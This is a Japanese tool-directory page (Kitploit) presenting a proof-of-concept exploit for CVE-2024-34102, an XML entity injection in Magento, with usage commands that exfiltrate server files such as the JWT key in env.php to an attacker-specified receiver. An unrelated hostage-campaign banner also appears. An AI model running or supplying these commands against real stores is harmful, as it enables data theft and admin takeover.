Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-34102 — CVE-2024-34102の概念実証エクスプロイト。Magentoにおける重大なXMLエンティティインジェクションであり、機密ファイルの外部への持ち出しや不正な管理者アクセスを可能にします。教育目的でのみ使用してください。 | Kitploit
ツール/GitHubGitHub/mksundaram69/cve-2024-34102
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出学習と教育
GitHubmksundaram69/cve-2024-34102

CVE-2024-34102

CVE-2024-34102の概念実証エクスプロイト。Magentoにおける重大なXMLエンティティインジェクションであり、機密ファイルの外部への持ち出しや不正な管理者アクセスを可能にします。教育目的でのみ使用してください。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🇮🇱 #BringThemHome #NeverAgainIsNow 🇮🇱

私たちは、テロ組織ハマスによって人質に取られたすべての市民の安全な帰還を要求します。すべての人質が解放され、無事に帰宅するまで、私たちは休むことはありません。あなたも彼らを家に連れ戻す手助けができます。 https://stories.bringthemhomenow.net/

CVE-2024-34102 PoC 🚀

このリポジトリには、Magento における重大な XML エンティティインジェクションの脆弱性(CVE-2024-34102)に対する概念実証(PoC)エクスプロイトが含まれています。この脆弱性により、機密ファイルの外部への持ち出し(exfiltration)が可能になり、それを利用して Magento の管理機能への不正アクセスを獲得することができます。このエクスプロイトは教育目的で設計されており、責任を持って使用する必要があります。

概要 📖

Magento は、世界中で使用されている最も人気のある e コマースソリューションの 1 つです。2024 年 6 月に、CVE-2024-34102 として識別される重大な事前認証 XML エンティティインジェクションの問題が発見されました。この脆弱性は、JWT の署名に使用される暗号鍵を含む Magento の app/etc/env.php ファイルの外部への持ち出しなど、深刻な結果を引き起こす可能性があります。

特徴 🌟

  • 脆弱な Magento インスタンスから機密ファイルを外部に持ち出します。
  • シンプルでわかりやすい使用方法。
  • XML エンティティインジェクションの教育的なデモンストレーション。

使用方法 🚀

前提条件

  • Python 3.x
  • requests ライブラリ(pip install requests)

エクスプロイトの実行

  1. リポジトリをクローンします:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
    cd CVE-2024-34102-exploit
    
  2. 必要な引数を指定してスクリプトを実行します:

    root@kitploit:~
    python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
    

コマンドライン引数

  • --target-url: ターゲットとなる Magento インスタンスの URL。
  • --target-file: 外部に持ち出すターゲットサーバー上のファイルパス。
  • --exfil-url: 持ち出したデータを受信する URL。

例 🌐

root@kitploit:~
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
ツールをダウンロード